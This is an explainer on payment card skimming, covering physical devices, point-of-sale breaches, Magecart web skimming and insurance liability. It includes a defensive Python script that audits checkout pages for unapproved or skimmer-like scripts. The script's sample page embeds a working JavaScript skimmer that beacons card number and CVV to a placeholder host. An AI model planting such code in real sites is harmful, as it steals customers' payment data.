What does skimming mean?

05 October 2018

Skimming is the theft of payment card data, which is typically used by criminals to commit fraud. Criminals “skim” payment data directly from payment card machines or from the payment infrastructure at a merchant location or e-commerce site.

Historically, skimming meant criminals installing a physical device at a merchant’s premises to harvest payment card data and transfer it to their own servers. The devices can be very sophisticated, small and difficult to discover. They are often hidden in credit card payment terminals, bank cash machines (ATMs) and self-service terminals, such as petrol pumps.

Over the years skimming has become more sophisticated and more widespread. For example, criminals now also hack into merchant networks in order to target point-of-sale (POS) systems, and are attacking contactless payment systems. In 2013, hackers targeted the POS systems of US retailer Target and stole the card details of more than 40 million customers. A year later, Home Depot also fell victim to a POS attack, in which the payment card details of some 56 million customers were compromised.

According to the Payment Card Industry Security Standards Council (PCI SSC), criminals skim because it is highly profitable. Perpetrators range from sophisticated and organised criminals leading complex and effective attacks, down to relatively unsophisticated criminals who use readily available, simple technology to steal cardholder data.

More recently, cyber criminals have been injecting card-skimming code into e-commerce websites: malicious JavaScript placed on a checkout page copies card details as the customer types them in and sends a copy to a server the criminals control, while the genuine transaction still goes through. The recent British Airways data breach is just the latest example of an alleged targeted skimming attack against a website. Cyber security researchers believe the attack against BA was carried out by a known web-skimming group, Magecart, which carried out a similar attack against Ticketmaster in June.

Another gang may have infiltrated more than 7,000 e-commerce sites in the past six months (20,000 since 2015), infecting them with malicious script designed to harvest customers’ payment card details, according to security consultant Willem de Groot. The campaign targets one of the most widely used e-commerce software platforms, Magento.
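The web-skimming attacks described in the two paragraphs above all rely on a script running on the merchant’s checkout page that the merchant did not put there. A practical first check is therefore to inventory the scripts on that page and flag anything unexpected. The following is an added example written for this page, not code from the original article or from any of the researchers or companies named in it. It assumes the merchant maintains an allowlist of script origins it expects on its payment page (`shop.example`, `cdn.example` here) and uses a constructed sample page in which one injected inline skimmer and one unknown third-party script have been planted; the `.example` and `.test` hostnames are reserved names used only for illustration.

```python
"""Audit a checkout page's script inventory for web-skimming indicators.

Added example, not part of the original article. Assumptions are marked below:
the allowlist, the sample HTML and the heuristic patterns are all constructed
for illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlist: hosts the merchant knowingly loads scripts from on the payment page.
APPROVED_SCRIPT_ORIGINS = {"shop.example", "cdn.example"}

# Heuristic: a skimmer typically both reads payment inputs and ships data off-site.
# Either pattern alone is common in legitimate code; the combination merits review.
CARD_FIELD_RE = re.compile(r"card|ccnum|cvv|cvc|expir", re.I)
EXFIL_RE = re.compile(r"XMLHttpRequest|fetch\(|sendBeacon|new Image\(|\.src\s*=", re.I)


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of <script src=...>
        self.inline = []        # bodies of <script>...</script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def audit_checkout_page(html, approved=APPROVED_SCRIPT_ORIGINS):
    """Return a list of (finding_kind, detail) tuples for scripts needing review."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname
        if host is None:            # relative URL: served by the merchant itself
            continue
        if host not in approved:    # third-party script the merchant did not approve
            findings.append(("unapproved_script_origin", src))
    for body in parser.inline:
        if CARD_FIELD_RE.search(body) and EXFIL_RE.search(body):
            findings.append(("inline_script_reads_card_fields_and_exfiltrates",
                             body.strip()[:60]))
    return findings


# Constructed sample page: two legitimate scripts, one unknown third-party script,
# and one injected inline skimmer hooked to the payment form's submit event.
SAMPLE_CHECKOUT_HTML = """
<html><body>
<form id="payment">
  <input name="cardNumber"><input name="cvv"><input name="expiry">
</form>
<script src="/js/checkout.js"></script>
<script src="https://cdn.example/jquery.min.js"></script>
<script src="//static.not-our-cdn.test/analytics.js"></script>
<script>
  // injected skimmer: copies card fields at submit time and beacons them off-site
  document.getElementById('payment').addEventListener('submit', function () {
    var d = {n: document.querySelector('[name=cardNumber]').value,
             c: document.querySelector('[name=cvv]').value};
    navigator.sendBeacon('https://collector.not-our-cdn.test/g', JSON.stringify(d));
  });
</script>
</body></html>
"""

if __name__ == "__main__":
    for kind, detail in audit_checkout_page(SAMPLE_CHECKOUT_HTML):
        print(f"{kind}: {detail}")
```

Run against the sample page, the audit reports the unknown `static.not-our-cdn.test` script and the inline skimmer; a page that loads only allowlisted scripts produces no findings. The inline heuristic is a triage aid, not a verdict: legitimate code also sets `.src` or calls `fetch(`, so each hit should be read by a person, and the external-script allowlist should be re-checked whenever the checkout page is deployed, since the attacks above worked precisely by changing what that page loaded.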


Why does it matter?

Skimming is a major problem for banks, payment card companies and retailers, undermining confidence in the payment card system as well as causing financial and reputational harm. The 2017 European ATM Crime Report found ATM-related fraud attacks increased by 26%, up from 18,738 in 2015 to 23,588 in 2016. In the UK, skimming and ATM fraud cost some GBP 43 million in 2016, up 32%, according to Financial Fraud Action UK.

Banks and payment card firms typically look to recoup losses and the costs of reissuing cards from retailers following a large skimming attack. As a result, retailers face a sizable third party liability for any breach of the Payment Card Industry Data Security Standard (PCI DSS), or where liability for such costs is written into their merchant contracts and ultimately passed on to the retailer. In some cases banks will resort to litigation to recover such costs.

Off-the-shelf cyber insurance policies will often exclude cover for these third party contractual liabilities (often referred to as PCI DSS fines and assessments), as this is an exposure that insurers are hesitant to cover. However, some cyber policies do provide specific coverage for payment card industry losses, while others will add such cover via an endorsement.


For further information, please contact Sarah Stephens, Head of Cyber, Content and New Technology Risks, at cyber@jltgroup.com.